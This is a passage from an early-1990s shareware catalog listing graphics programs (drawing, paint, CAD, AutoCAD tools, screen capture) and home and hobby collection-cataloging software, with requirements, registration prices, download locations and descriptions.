+ Registration benefits: Printed manul, latest version of the + program, phone support. + Version: 2.0 (01-01-91) + User benefits: Printed manul, latest version of the program, + phone support. + Look for: availability unknown on BBSs; STFGRA.ZIP in IBMAPP + forum LIB 3 on CompuServe. + Download size: 560k + Special instructions: Product distribution restricted to the + United States. + Description: + Data stored in all or selected records of a DBF file can + directly be plotted on the screen, printer or plotter in one or + more of the types: Line, Marks, Bar, Stacked Bar, Pie, High- + Low. Graphs can be stored on disk in PCX format. The + orientation of graphs can be portrait or landscape. Over 70 + printer and plotters are supported. Titles and a legend can be + defined. Scaling can be manual or automatic (logarithmic too). + Up to six functions can be plotted on one graph. A background + grid can be generated. + + Chapter 14, "Graphics" 333 + + + + Product: WAMPUM + Menu-Driven dBASE-Compat. DBMS in a 20K TSR. See full + description on page 153. + + + 14.2 Drawing programs + + Product: The Children's Graphics Program + Needs: IBM PC, DOS 2.0 or better. 256k RAM, mouse, EGA monitor. + Author: Motes Educational Software, 501-442-5652 + Registration: $10.00 + Registration benefits: Mail support. Shareware disks of other + programs. + Version: 3.0 (12-12-91) + User benefits: Mail support. Shareware disks of other programs. + Look for: availability unknown on BBSs; DRAW30.ZIP in IBMAPP + forum LIB 10 on CompuServe. + Download size: 76k + Description: + Can be used to draw lines, boxes, circles, arcs, and macros. + These drawings can be painted, edited, stored, and even + animated. Pictures can be exported to other programs written + with PowerBasic. + + Product: Dad's Choice + Children's math and graphics program. See full description on + page 329. + + Product: DRAFT CHOICE [***] + Powerful, Vector Based CAD Program. See full description on + page 337. + + Product: FLODRAW + Needs: IBM PC, DOS 2.0 or better. 512k RAM, CGA monitor. + Registration: $37.50 + Registration benefits: Printed user manual, disk of symbols used + in symbol libraries. + Version: 2.2 (11-30-90) + User benefits: Printed user manual, disk of symbols used in + symbol libraries. + Look for: FDRAW22*.ZIP (multiple files) on BBSs; FDRAW*.ZIP in + IBMAPP forum LIB 10 (multiple files) on CompuServe. + Download size: 260k + Description: + Draws black & white diagrams like flowcharts, electric + schematics, and organization charts. Great for documentation! + Symbol libraries for flowcharts, electronic schematics, logic + diagrams, and others included. Or draw your own symbols and + create your own symbol libraries. Automatic line drawing, last + symbol undo, multiple fonts, menu driven. Keyboard control + only. Includes utility to convert diagrams to PCX format files. + Interactive tutorial gets you started quickly. + + Chapter 14, "Graphics" 334 + + + + Product: Magic Brush & Magic Show + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Nassib Nassar + Registration: $25.00 + Registration benefits: Printed manual and program disk, 1 year + support by mail, nominal upgrade fees. Overseas: add $6.00 for + postage. + Version: 1.50 (08-16-89) + User benefits: Printed manual and program disk, 1 year support by + mail, nominal upgrade fees. Overseas: add $6.00 for postage. + Look for: availability unknown on BBSs; MB150.ARC in IBMAPP forum + LIB 10 on CompuServe; MB150.ARC in IBMPC RTC LIB 14 on GEnie. + Download size: 140k + Description: + A drawing/painting and slide show program. It allows accurate + pixel by pixel control of drawing. Status screen overlay for + accurate cut and paste. Several paste modes, color remapping, + horizontal, vertical, or diagonal flip, on-line help screen. + Has simple script language for slide show and simple animation. + + Product: PathProj + Path Projection for Ridge Regression. See full description on + page 282. + + Product: PC-Draft-CAD + Vector based Computer Aided Design & Drafting. See full + description on page 338. + + Product: Recursive Realm + Fast and fun fractal exploration program. See full description + on page 281. + + Product: RXridge + Ridge Regression Computations & Graphics. See full description + on page 283. + + Product: RXtraces + Interactive Ridge Regression TRACE Displays. See full + description on page 283. + + Product: STAFF-GRAF + Graphics for Data stored in dBASE III format. See full + description on page 332. + + Product: Stringer/2 + Draws string art. See full description on page 320. + + Product: WinGraph [***] + Cartesian (2D & 3D) & Polar Equation Grapher. See full + description on page 280. + + Chapter 14, "Graphics" 335 + + + + 14.3 Paint programs + + Product: The Children's Graphics Program + Children's drawing, painting, and animation. See full + description on page 333. + + Product: Magic Brush & Magic Show + Drawing/painting and slide show for CGA. See full description + on page 333. + + Product: PC-Draft II + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Natural Software, 708-377-7320 + Registration: $50.00 + Registration benefits: Printed manual, master disks, phone + support, Clip-Art Libraries. + Version: 3.26 (01-01-91) + User benefits: Printed manual, master disks, phone support, Clip- + Art Libraries. + Look for: PCDRAFT*.EXE (multiple files) on BBSs (call + 312-276-4159 to download it at no charge); PCDRA*.EXE in IBMAPP + forum LIB 10 (multiple files) on CompuServe. + Download size: 237k + Description: + Bitmap Paint program: pop-up menus or single keystroke + commands. Mouse support. Large clip art library. Screen + Capture. 40 fonts & font editor. Slide show language (PIX). + Uses CGA 640 x 200 mode. + + Draw circles, ellipses, lines, boxes, arcs, curves, spray + paint, free form draw. Draw bar, line and pie graphs. Create + and edit fill patterns. Keyboard macros. Grid/Snap. Undo. + Preview. Rotate & size objects. Cut & paste. Supports dot- + matrix & LaserJet printers. + + Exports GEM .IMG files. + + Product: QFont + Font editor for HP LaserJet soft fonts. See full description + on page 61. + + Chapter 14, "Graphics" 336 + + + + Product: Strudle + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $30.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 3.8 (06-22-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: STRUDLE.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 109k + Description: + This is a unique drawing/painting program for children of any + age. It's an excellent educational, developmental, FUN tool + designed to be as simple as possible. It's actually a child's + "crayola" version of an art-quality drawing program. It has + sound effects, saves drawings to work on or enjoy again later, + and much more. It's fun watching the drawings happen again. + Ten sample drawings are included. When drawings are loaded + they are redrawn as if you were watching them the first time. + + 14.3.1 Graphics diversions + + Product: Dr. Motes' Colorbook + Needs: IBM PC, DOS 2.0 or better. 256k RAM, EGA monitor, mouse. + Author: Motes Educational Software, 501-442-5652 + Registration: $10.00 + Registration benefits: More graphics pages. Shareware disks of + other programs. + Version: 1.0 (02-02-92) + User benefits: More graphics pages. Shareware disks of other + programs. + Look for: availability unknown on BBSs; DMCB.ZIP in IBMAPP forum + LIB 10 on CompuServe. + Download size: 61k + Description: + This program can be used like a children's coloring book. It + comes with several pages of graphics pictures that can be + painted/colored using 16 different colors. Easy to use and fun + for the little ones. + + Chapter 14, "Graphics" 337 + + + + 14.4 Presentation graphics + + Product: HyperSlide + Needs: IBM PC, DOS 2.1 or better. Mouse; CGA monitor. + Author: John Intorcio, 617-246-9640 + Registration: $50.00 + Registration benefits: Printed Manual & Disk, Telephone Support. + Version: 1.02 (05-12-91) + User benefits: Printed Manual & Disk, Telephone Support. + Look for: HYPSLD.EXE on BBSs (call 206-643-5477 to download it at + no charge); HYPSLD.EXE in ASDESK forum LIB 10 on CompuServe. + Download size: 287k + Description: + A presentation system based on AutoCAD slide (.SLD) files. It + allows the generation of stand-alone .EXE files containing all + images and control structures. The presentation designer + allows for rapid presentation design by using menus to allow + inclusion of slide images and placemnt of buttons and controls. + Control types include simple links, timed links, shells to + external programs, etc. + + Product: Magic Brush & Magic Show + Drawing/painting and slide show for CGA. See full description + on page 333. + + Product: MakeDemo + Presentation program with interactive menuing. See full + description on page 184. + + Product: SlideManager + AutoCAD Slide Library Manager. See full description on + page 345. + + Product: STAFF-GRAF + Graphics for Data stored in dBASE III format. See full + description on page 332. + + + 14.5 CAD/CAM applications + + See also: Engineering (page 258). + + Chapter 14, "Graphics" 338 + + + + Product: DRAFT CHOICE [***] + Needs: IBM PC, DOS 2.11 or better. 412k RAM; Hercules or CGA + monitor. + Author: TRIUS, Inc., 508-794-9377 + Registration: $56.00 + Registration benefits: Printed manual, master disks, bonus + utilities, bonus fonts, bonus symbol libraries, 90-day support, + newsletter. + Version: 1.51g (01-09-92) + User benefits: Printed manual, master disks, bonus utilities, + bonus fonts, bonus symbol libraries, 90-day support, + newsletter. + Look for: DC151.ZIP on BBSs (call 617-354-2505 to download it at + no charge); DC151.ZIP in IBMAPP forum LIB 10 on CompuServe. + Download size: 315k + Special instructions: Product distribution restricted to the + United States. + Description: + Vector Based, affordable CAD program with over 180 Drawing, + Viewing and Editing commands. Mouse and Keyboard Operation. 9- + pin, 24-pin, HP Laserjet/Deskjet and HP Pen Plotter Support. + Auto-dimensioning, Multiple Layers, English and Metric Units, + Auto-Scaling, Powerful Floating Point Zoom. Symbol Library + Support, Animation, On-Line calculator, Parametric Function + Generator, EEMS and Virtual Memory Support, Primary and + Secondary Text Fonts, and much more... + + Product: Layout + Office layout and equipment inventory. See full description on + page 215. + + Product: PC-Draft-CAD + Needs: IBM PC, DOS 2.0 or better. CGA or Hercules monitor. HPGL + plotter or HP LaserJet or dot-matrix printer. + Author: Natural Software, 708-377-7320 + Registration: $65.00 + Registration benefits: Printed manual, master disks, utilities. + Version: 3.06 (06-01-91) + User benefits: Printed manual, master disks, utilities. + Look for: PCDCAD*.EXE (multiple files) on BBSs (call 312-276-4159 + to download it at no charge); PCCAD*.EXE in IBMAPP forum LIB 10 + (multiple files) on CompuServe. + Download size: 325k + Description: + Vector based CAD: Automatic dimensions, unlimited layers, + multiple fonts & object libraries. Uses high resoution CGA, + EGA, VGA, or Herc. "Virtual Memory" uses extended, expanded + memory or disk for drawings up to 32 megabytes. + + Pop up menus or single keystroke commands. Mouse support, + context sensitive help. Over 65 commands + undo/redo, pan, + zoom, fill patterns, Macros. Make exact scale prints with HPGL + plotters, dot-matrix or laser printers. Exports WPG GEM HPGL + ASCII. Imports WPG DXF ASCII. + + Chapter 14, "Graphics" 339 + + + + Product: PlotManager + Needs: IBM PC, DOS 2.1 or better. + Author: John Intorcio, 617-246-9640 + Registration: $50.00 + Registration benefits: Printed Manual and Disk, Telephone + Support. + Version: 2.22 (05-13-91) + User benefits: Printed Manual and Disk, Telephone Support. + Look for: PLOTM.EXE on BBSs (call 206-643-5477 to download it at + no charge); PLOTM.EXE in ADESK forum LIB 10 on CompuServe. + Download size: 183k + Description: + Provides stand-alone, on-screen viewing of HPGL, DMPL, and SPGL + plot files, Plotting of zoomed views, plotter communictions + support to 38.4k baud, transaltion from plot format to .DXF + format for import into AutoCAD, network plot-server mode and + more. + + + 14.6 Business applications + + See also: Business (page 190). + + Product: ALPHAQUOTE + Needs: IBM PC, DOS 3.0 or better. + Author: AlphaBytes, Inc., 202-546-4119 + Registration: $29.00 + Registration benefits: Latest version and a printed manual. + Version: 2.3 (05-06-91) + User benefits: Latest version and a printed manual. + Look for: AQ23.ZIP on BBSs (call 414-789-4202 to download it at + no charge); AQ23.EXE in DTPFORUM forum LIB 6 on CompuServe. + Download size: 113k + Description: + Estimating and copyfitting for DTP and typesetting. Useful for + determining how much graphic products should sell for. Great + for comparing the price differences between DTP and traditional + typesetting. Features include; hourly rates generator, graphic + arts calculator, disk or printed estimates, preview, on-line + help, menu interface and complete docs. + + Chapter 14, "Graphics" 340 + + + + 14.6.1 OCR applications + + Product: PRO-CR + Needs: IBM PC, DOS 3.0 or better. Scanner. + Author: Gray Design Associates + Registration: $42.00 + Registration benefits: Latest registered version. + Version: 2.02 (06-02-91) + User benefits: Latest registered version. + Look for: availability unknown on BBSs; PRO-CR.EXE in IBMAPP + forum LIB 12 on CompuServe. + Download size: 160k + Description: + Professional optical character recognition. New features: Font + selection not required, preview mode, online correction mode, + supports 200 DPI (fax), mis-recognitions flagged, supports + compressed tiffs and pcx files, CGA, EGA, VGA and Hercules. + Also includes optional command line interface from DOS. + + + 14.7 File format translators + + See also: Utilities, File utilities, File conversion (page 38). + + Product: CODE TO CODE + DTP & Typesetting code conversion program. See full + description on page 135. + + Product: Paint Shop Pro [***] + Needs: IBM AT (80286), Windows 3.0 or better. + Author: JASC, Inc., 612-934-7117 + Registration: $49.00 + Registration benefits: Printed manaul, master disks, support. + Version: 1.01 (03-26-92) + User benefits: Printed manaul, master disks, support. + Look for: availability unknown on BBSs; PSP.ZIP in GRAPHSUP forum + LIB 4 on CompuServe. + Download size: 201k + Description: + A Windows program that will display, convert, alter and print + images. It also does screen capturing. It supports image + formats; BMP, DIB, GIF, IMG, JAS, MAC, MSP, PIC, PCX, RAS, RLE, + TGA, TIFF and WPG. Display in various ways including zooming in + and out. Alter includes rotating, resizing, resampling, + trimming, filter application, color adjustments, brightness and + contrast adjusting, increasing and decreasing the color depth, + gamma correcting and greyscaling. User filters are supported. + + Product: PCX2FNT [***] + Create fonts for LaserJet from PCX graphics. See full + description on page 60. + + Chapter 14, "Graphics" 341 + + + + Product: PixFolio Image Catalog System + Windows Image Cataloging System. See full description on + page 11. + + + 14.8 Tools & utilities + + Product: Paint Shop Pro [***] + Image displayer, converter, editor. Scrn Cap. See full + description on page 340. + + Product: PixFolio Image Catalog System + Windows Image Cataloging System. See full description on + page 11. + + Product: PrintGL [***] + Pen plotter emulator. See full description on page 45. + + Product: QFont + Font editor for HP LaserJet soft fonts. See full description + on page 61. + + Product: RIE - Rimrock Icon Editor + Editor for creating custom EGA/VGA text icons. See full + description on page 299. + + Product: Show Partner Lite + Screen Show and Demo Disk Development System. See full + description on page 331. + + 14.8.1 Screen capture + + Product: Capbuf + TSR captures text screens to disk. See full description on + page 77. + + Product: GEMCAP + Needs: IBM PC, DOS 2.0 or better. Any wordprocessor or desktop + publishing program that reads GEM .IMG format images. + Author: Natural Software, 708-377-7320 + Registration: $35.00 + Registration benefits: Master disks, phone support. + Version: 4.01 (09-01-90) + User benefits: Master disks, phone support. + Look for: GEMCAP.ZIP on BBSs (call 312-276-4159 to download it at + no charge); GEMCAP.ZIP in IBMSYS forum LIB 3 on CompuServe. + Download size: 13k + Description: + TSR utility: Capture text and graphics screens, save as bitmap + GEM .IMG files (B&W), perfect for Ventura Publisher & + WordPerfect. Preserves reverse video fields in text mode. Uses + resident EGA/VGA font for EXACT reproduction of screen. Perfect + for user manuals. + + Chapter 14, "Graphics" 342 + + + + Supports CGA (640x300), EGA (640x350), VGA (640x480) graphics + modes & all text modes (25,43,50 lines). (Mono & Hercules - + text mode only). + + Product: PC-Draft II + Paint program w/screen capture. See full description on + page 335. + + Product: Textshot + TSR to capture text screens to .PCX files. See full + description on page 78. + + + 14.9 Ready-made graphic images + + 14.9.1 Multi-format images + + Product: PixFolio Image Catalog System + Windows Image Cataloging System. See full description on + page 11. + + 14.9.2 PCX images + + Product: STAFF-GRAF + Graphics for Data stored in dBASE III format. See full + description on page 332. + + + 14.10 Software tools + + 14.10.1 For AutoCAD + + Product: -=Tab123=- + Needs: IBM PC, DOS 3.0 or better. Release 9 AutoCAD or later. + Author: Mountain Software, 304-744-7748 + Registration: $34.00 + Registration benefits: Printed manual, master disks, support, one + year free upgrades. + Version: 1.2 (12-17-91) + User benefits: Printed manual, master disks, support, one year + free upgrades. + Look for: TAB123.ZIP on BBSs; TAB123.EXE in ACAD forum LIB 8 on + CompuServe; TAB123.ZIP in IBM-PC RTC LIB 14 on GEnie. + Download size: 46k + Description: + Imports Lotus 123 and Symphony spreadsheet files into an + AutoCAD drawing as a table of text entities, and if desired, a + cell grid to enclose the table. Tab123 runs from within the + AutoCAD drawing editor and will read .WKS and WK1 files + directly. The program reads not only entered data from the + spreadsheet file, but also calculated formula values and + formatting information (eq Column widths, cell formats). + + Chapter 14, "Graphics" 343 + + + + Product: AC11TO10 + Needs: IBM PC, DOS 3.0 or better. NO coprocessor required! + Author: Software Designs, Inc., 606-987-6129 + Registration: $49.95 + Registration benefits: Unlimited phone/CompuServe/mail support, + free upgrades. + Version: 2.20 (03-01-92) + User benefits: Unlimited phone/CompuServe/mail support, free + upgrades. + Look for: availability unknown on BBSs; 11TO10.ZIP in ADESK forum + LIB 10 on CompuServe. + Download size: 65k + Description: + This utility converts Release 11 drawings to Release 10 without + using DXF files. Just type 'AC11TO10' at the DOS prompt, tag + the drawings you want converted and hit ENTER. Works directly + with the DWG file format SAFELY. Single, easy-to-use, windowed + environment. Great for AutoCAD users who require access + Release 11 drawings but don't need to upgrade from Release 10. + + Product: ALLY + Needs: IBM PC, DOS 3.0 or better. AutoCAD release 9 or better. + Author: Wasco Technical Software, 713-392-1359 + Registration: $49.95 + Registration benefits: Diskette and printed manual, CIS/phone/fax + support, product news. + Version: 1.32 (03-18-91) + User benefits: Diskette and printed manual, CIS/phone/fax + support, product news. + Look for: availability unknown on BBSs; ALLY13.ZIP in ADESK forum + LIB 2 on CompuServe. + Download size: 108k + Description: + A programer's workbench and analyzer for AutoLISP. The + analyzer aids in debugging and documenting AutoLISP source code + by error checking and cross-referencing Lisp symbols - + variables, constants, functions and subroutines. The workbench + features point-and-shoot file selection, a DOS shell, and + integrates your favorite editor, browser and other tools. Run + from DOS or AutoCAD. Rated "Highly Recommended" by CADalyst + magazine, March 1991. + + Chapter 14, "Graphics" 344 + + + + Product: CADET + Needs: IBM PC, DOS 3.0 or better. AutoCAD release 9 or better. + Author: Wasco Technical Software, 713-392-1359 + Registration: $49.95 + Registration benefits: Diskette and printed manual, CIS/phone/fax + support, product news. + Version: 3.0 (03-18-91) + User benefits: Diskette and printed manual, CIS/phone/fax + support, product news. + Look for: availability unknown on BBSs; CADET3.ZIP in ADESK forum + LIB 10 on CompuServe. + Download size: 345k + Description: + Allows users to create notes and text tables, and edit both + text and attributes in AutoCAD drawings. + * Full-screen text editor + * 112,000+ word Spelling checker + * Pull-down menus + * Word wrap + * Help + * Status lines + * Search-and-replace + * Find text + * Cut-and-paste + * Change style, height and case + * EGA/VGA support + * Import and export text + * Works from within AutoCAD + + Product: Custom#Menu + Needs: IBM PC, DOS 3.0 or better. AutoCAD release 9 or later. + Author: Mountain Software, 304-744-7748 + Registration: $34.00 + Registration benefits: Printed manual, master disks, support, one + year of free upgrades. + Version: 1.81 (12-18-91) + User benefits: Printed manual, master disks, support, one year of + free upgrades. + Look for: CMENU181.ZIP on BBSs; CMNU18.EXE in ACAD forum LIB 8 on + CompuServe; CMENU181.ZIP in IBM-PC RTC LIB 14 on GEnie. + Download size: 85k + Description: + An easy to use AutoCAD menu customizing tool. Add, delete, or + modify Tablet, Button, and first level Popup and Screen menus + from within AutoCAD. "Learn" macros as they are entered and + includes an "Edit" mode for expert users. Multi command items + can be quickly created to greatly increase your productivity + with no knowledge of the AutoCAD menu structure. Special + support is also provided for block inserts and external + AutoLISP programs. Both Release 11 ADS and AutoLISP / DOS EXE + versions included. + + Chapter 14, "Graphics" 345 + + + + Product: HyperSlide + AutoCAD Slide FIle Based Hyper Link System. See full + description on page 337. + + Product: LaunchCAD + Needs: IBM PC, DOS 3.0 or better. AutoCAD release 9 or later. + Author: Mountain Software, 304-744-7748 + Registration: $34.00 + Registration benefits: Printed manual, master disks, support, one + year free upgrades. + Version: 3.7 (10-07-91) + User benefits: Printed manual, master disks, support, one year + free upgrades. + Look for: LCAD37.ZIP on BBSs; LAUNCH.EXE in ACAD forum LIB 8 on + CompuServe; LCAD37.ZIP in IBM-PC RTC LIB 14 on GEnie. + Download size: 121k + Description: + A superb replacement for the AutoCAD opening menu, it provides + a friendly face, and file management capabilities to AutoCAD. + It compliments AutoCAD, it provides a fast pulldown menu + interface that allows: Drawing file selection from a popup + directory; User defined long file descriptions; Batch + processing and plotting from a user defined script; An external + utility interface; Network and release 11 support; File select + support for internal AutoCAD commands, and more. + + Product: PrintCAD [***] + Printer driver for CAD software. See full description on + page 45. + + Product: PrintGL [***] + Pen plotter emulator. See full description on page 45. + + Product: PURGE + Needs: IBM PC, DOS 3.0 or better. NO coprocessor required! + Author: Software Designs, Inc., 606-987-6129 + Registration: $69.95 + Registration benefits: Phone/CompuServe/mail support free + upgrades. + Version: 2.20 (03-01-92) + User benefits: Phone/CompuServe/mail support free upgrades. + Look for: availability unknown on BBSs; PURGE.ZIP in ADESK forum + LIB 10 on CompuServe. + Download size: 70k + Description: + Lets you purge your drawings from the DOS prompt WITHOUT using + DXF files. Selectively purge any or all of Blocks, Linetypes, + Layers, Dimstyles or Shapes. Single, easy-to-use, windowed + environment. Just set which entities should be purged, tag the + drawings and press ENTER. Best of all, it operates in a SINGLE + pass - even deeply nested blocks are no problem! Quick, safe + and extremely easy to use. + + Chapter 14, "Graphics" 346 + + + + Product: SlideManager + Needs: IBM PC, DOS 2.1 or better. + Author: John Intorcio, 617-246-9640 + Registration: $25.00 + Registration benefits: Printed Manual & Disk, Telephone Support. + Version: 5.13 (05-13-91) + User benefits: Printed Manual & Disk, Telephone Support. + Look for: SLIDEM.EXE on BBSs (call 26-643-5477 to download it at + no charge); SLIDEM.EXE in ADESK forum LIB 10 on CompuServe. + Download size: 133k + Description: + A full function library manager for AutoCAD slide files. + SlideManager provides full library management functions such as + Add, Delete, Extract, Merge, and Update as well as stand-alone + viewing of slide files and entries from slide libraries. + Translation to Drawing Interchange or HPGL format as well as + output to printers is also provided. + + 14.10.2 For other + + Product: NETCLASS [***] + Provides electronic classroom on Novell LANs. See full + description on page 327. + + + 14.11 Other + + Product: Fantasy + Interactive graphic kaleidoscope - hypnotic. See full + description on page 423. + + Product: Listico + Two icon viewing programs, one DOS, one WIN 3. See full + description on page 331. + + Product: Quilt + Needs: IBM PC, DOS 2.1 or better. EGA monitor. + Author: Cascoly Software, 206-523-6135 + Registration: $20.00 + Registration benefits: Phone/CompuServe support. + Version: 1.21 (03-30-92) + User benefits: Phone/CompuServe support. + Look for: availability unknown on BBSs; QUILT.ZIP in IBMNEW forum + LIB 5 on CompuServe. + Download size: 50k + Description: + A diverting graphics program or nonresident screen saver, using + half square quilting patterns. You can create specific + patterns or set the program to continuously change patterns. + Change widths, patterns, rotate or flip the designs, or colors + for "billions and billions" of combinations. Configurable color + palettes (v1.1 lets you set 8 colors at a time) chosen from 64 + possible colors. Ages 8 to 88. + + Chapter 14, "Graphics" 347 + + + + Product: ZiPaper + Needs: IBM PC, Windows 3.0 or better. PKZIP/PKUNZIP or LHARC. + Author: Daniel Thomas, 714-524-5625 + Registration: $15.00 + Registration benefits: Disk, printed manual, assorted wallpaper + files. + Version: 1.3c (12-30-91) + User benefits: Disk, printed manual, assorted wallpaper files. + Look for: availability unknown on BBSs; ZIPAPR.ZIP in WINNEW + forum LIB 5 on CompuServe. + Download size: 49k + Description: + Randomly select Windows 3.0 .BMP files for wallpaper each time + you run Windows. Keep the .BMP files in one compressed ZIP or + LZH file. Save disk space! Supports Tile/Center and more. New + features include improved support for multiple ZIP files, + manual selection of BMP file, support for LHArc and more. + + Chapter 15, "Home & hobby" 348 + + + + + + Chapter 15 + Home & hobby + + See also: Finances, Personal finances (page 242); Business, + Work-at-home (page 233). + + + 15.1 Astronomy + + Product: PC-TRACK + Needs: IBM PC, DOS 2.0 or better. EGA monitor, 640k RAM. + Author: Thomas C. Johnson, 513-878-9174 + Registration: $25.00 + Registration benefits: Printed manual, quick reference card, + master disks, six months support. + Version: 2.14 (01-09-92) + User benefits: Printed manual, quick reference card, master + disks, six months support. + Look for: availability unknown on BBSs. + Download size: 355k + Description: + This general purpose satellite tracking package takes the + complexity and confusion out of finding where any earth + orbiting satellites (weather, amateur radio, military, foreign, + etc.) are in space. It will track up to 8 satellites + simultaneously and will provide necessary antenna pointing + data. It provides a colorful, graphical means of visualizing + satellite orbits both in stunning 3D spherical displays and + flat map displays. + + + 15.2 Collecting + + Product: ALBUM KEEPER II + Needs: IBM PC, DOS 3.0 or better. 512k RAM. Hard Disk + recommended. + Author: CACHE MICROSYSTEMS, 805-549-0532 + Registration: $17.00 + Registration benefits: 1 yr. Technical support. + Version: 2.12 (06-01-91) + User benefits: 1 yr. Technical support. + Look for: ALBUM212.ZIP on BBSs (call 414-789-4210 to download it + at no charge). + Download size: 198k + Special instructions: Product distribution restricted to the + United States. + Description: + Easy to menu driven album, CD, Tape organizer. This program + keeps track of the entire album collection. Unique features + allow the user to find albums, song titles and artists. This + program keeps track of album titles and songs on album with + tape position,length of song and song number. Duplicate entry + + Chapter 15, "Home & hobby" 349 + + + + search keeps database clean and useful. Several printer outputs + allows user to print complete list of album, individual albums, + labels for tapes. 10 user defined fields. Laser printer + support. + + Product: AlbumMaster + Needs: IBM PC, DOS 2.1 or better. IBM Graphics printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Registration benefits: Master disks, phone/BBS/mail support. + Shareware disks of other programs. + Version: 6.71 (09-02-91) + User benefits: Master disks, phone/BBS/mail support. Shareware + disks of other programs. + Look for: AMSTR670.ZIP on BBSs (call 317-784-2147 to download it + at no charge); AMSTR6.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 160k + Description: + Designed for audiophiles who want to catalog their albums and + produce professional looking printouts, the program is easy to + use and POWERFUL. Standard entries for Title, Artist, Album + Number, Category, and Tunes PLUS 3 User Defined Fields! The + user can obtain print outs for criteria or all, and can search + for all fields or combination, even Tunes! Print Outs include: + An abbreviated listing, full catalog, a custom lisiting, 3X5 + and Rolodex cards, front labels, and a complete Tune listing! + + Product: Book Librarian + Needs: IBM PC, DOS 2.11 or better. 512K Ram, Color Monitor + Recommended. + Author: TurboSystemsCo, 404-516-8575 + Registration: $34.95 + Registration benefits: Latest version, printed manual, free + technical support, product discounts, update/upgrade notices. + Version: 1.5s (01-28-92) + User benefits: Latest version, printed manual, free technical + support, product discounts, update/upgrade notices. + Look for: BL.ZIP on BBSs; BL.ZIP in IBMAPP forum LIB 7 on + CompuServe; BL15.ZIP in IBMPC RTC LIB 15 on GEnie. + Download size: 147k + Description: + Powerful easy-to-use menu-driven program to organize and manage + a personal, club, corporate, church or school library. Features + context sensitive help, BROWSE and FIND windows. Each record + stores title, author, subject, book type, catalog # and much + more. Full featured reporting with numerous reports to the + screen, printer or disk. + + Chapter 15, "Home & hobby" 350 + + + + Product: BookBank [***] + Needs: IBM PC, DOS 3.0 or better. Hard disk. + Author: Data By Design, 803-556-0562 + Registration: $50.00 + Registration benefits: Printed manual, master disks, phone/ + CompuServe/mail support, free minor updates, discounted major + upgrades. + Version: 1.1 (02-01-92) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support, free minor updates, discounted major upgrades. + Look for: BOOKBK11.ZIP on BBSs (call 803-764-1724 to download it + at no charge); BBANK1.ZIP in COLLECT forum LIB 10 on + CompuServe. + Download size: 340k + Description: + A full featured program for book collectors and lovers. Keeps + track of what books you own, what they are worth, and full + descriptions. It also tracks the dealers and other collectors + you associate with, and helps you develop and track your own + want-list. Multiple searches, formats and reports can be sent + to screen, printer or file. Has pull-down menus so it is fast, + powerful, and easy to use. From the developer of Book-Stor, + the program for collectible book dealers. + + Product: CassetteMaster + Needs: IBM PC, DOS 2.1 or better. IBM Graphics printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Registration benefits: Master disks, phone/BBS/mail support. + Shareware disks of other programs. + Version: 7.40 (07-20-91) + User benefits: Master disks, phone/BBS/mail support. Shareware + disks of other programs. + Look for: CMSTR740.ZIP on BBSs (call 317-784-2147 to download it + at no charge); CMSTR7.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 160k + Description: + Designed for users who want to catalog their cassettes and + produce professional looking printouts, the program is easy to + use and POWERFUL. Standard entries for Title, Artist, Tape + Number, Category, and Tunes PLUS 3 User Defined Fields! The + user can obtain print outs for criteria or all, and can search + for all fields or combination, even Tunes! Print Outs include: + An abbreviated listing, full catalog, a custom lisiting, 3X5 + and Rolodex cards, front labels, or J Card style case inserts & + a Tune list! + + Chapter 15, "Home & hobby" 351 + + + + Product: CDMaster + Needs: IBM PC, DOS 2.1 or better. IBM Graphics printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Registration benefits: Master disks, phone/BBS/mail support, + bonus utilities. Shareware disks of other programs. + Version: 6.71a (10-06-91) + User benefits: Master disks, phone/BBS/mail support, bonus + utilities. Shareware disks of other programs. + Look for: CDMSTR67.ZIP on BBSs (call 317-784-2147 to download it + at no charge); CDMSTR.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 160k + Description: + CD lovers need a program as sophisticated as the format itself + to catalog their collections. This is the answer! The program + is easy to use and POWERFUL. Standard entries for Title, + Artist, CD Number, Category, and Tunes PLUS 3 User Defined + Fields! The user can obtain print outs for criteria or all, and + can search for all fields or combination, even Tunes! Print + Outs include: An abbreviated listing, full catalog, a custom + lisiting, 3X5 and Rolodex cards, front labels, and a complete + Tune list! + + Product: Collect! (VGA version) + Needs: IBM AT (80286), DOS 3.3 or better. Mouse,VGA. + Author: Alston Software Labs, 209-522-8666 + Registration: $40.00 + Registration benefits: 1 year voice/fax/CIS/mail support, 1 year + free upgrades, text version disk. + Version: 1.01 (01-01-92) + User benefits: 1 year voice/fax/CIS/mail support, 1 year free + upgrades, text version disk. + Look for: availability unknown on BBSs; COLECT.ZIP in IBMAPP + forum LIB 7 on CompuServe; COLLECT!.ZIP in IBM RTC LIB 0 on + GEnie. + Download size: 285k + Description: + Designed for the range of casual collectibles lover to the + dealer, the VGA VERSION shares files with it's text mode + sibling and adds a 640 x 480 pixel GUI featuring pushable + pushbuttons, clipboard feature, data graphing, and more. It is + fully user configurable and works with ANY collection you may + have. Extensive financial analysis capability allows you to + plan a collection properly, and powerful file manipulation + tools keeps a collection organised. Text mode works with _any_ + 512K PC. + + Product: DiscTrak System + LaserDisc & Compact Disc Cataloging Program. See full + description on page 361. + + Chapter 15, "Home & hobby" 352 + + + + Product: Household Register + Needs: IBM PC, DOS 2.1 or better. 384k RAM. + Author: TurboSystemsCo, 404-516-8575 + Registration: $34.95 + Registration benefits: Printed manual, latest version, technical + support, product discounts. + Version: 3.0s (01-28-92) + User benefits: Printed manual, latest version, technical support, + product discounts. + Look for: HR.ZIP on BBSs; HR.ZIP in IBMAPP forum LIB 7 on + CompuServe; HR30.ZIP in IBMPC RTC LIB 15 on GEnie. + Download size: 153k + Description: + Excellent easy-to-use menu-driven home/office inventory program + holds upto 99,999 items and can use an unlimited 